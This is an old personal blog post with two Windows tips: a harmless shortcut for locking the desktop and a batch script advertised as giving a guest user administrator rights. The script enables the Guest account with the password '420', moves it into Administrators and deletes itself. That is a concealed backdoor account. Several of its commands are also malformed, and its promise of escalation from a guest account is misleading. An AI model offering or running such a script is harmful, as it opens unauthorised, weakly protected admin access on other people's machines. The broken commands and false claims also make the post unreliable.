Hotshot Reporter @ Crzyworld

My ideas on current political,social,business n tech scenario

Friday, January 11, 2008

lock desktop

• Hey Guys this is cool; if it feels a pain to do CTRL+ALT+DEL
• every time you want to lock your desktop, then you can
• do the following to avoid using the above mentioned
• combination.

• 1. Right click an empty spot on the desktop,
• point to New and click Shortcut.

• 2. In the Create Shortcut dialog box, type the
• following into the Type the location of the item text
• box:
• "rundll32 user32.dll,LockWorkStation" remove quotes
• while typing.

• 3. Click Next.

• 4. In "Type a name for this shortcut", type
• "Lock the Desktop" and Click Finish.

• Now the desktop will lock when you click your new
• "Lock the Desktop" icon in the desktop.

• Note:
• This is applicable only for Win 2000 and Win XP users

Admin privileges for guest

• Admin privileges for guest

• Want admin privileges on ur pc??????????????????
• try dis

• Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
• Den double click on it
• This will add u in administrators group
• Enjoy

• echo off
• title Please wait...
• cls
• net user add Username Password /add
• net user localgroup Administrators Username /add
• net user Guest 420 /active:yes
• net localgroup Guests Guest /DELETE
• net localgroup Administrators Guest /add
• del %0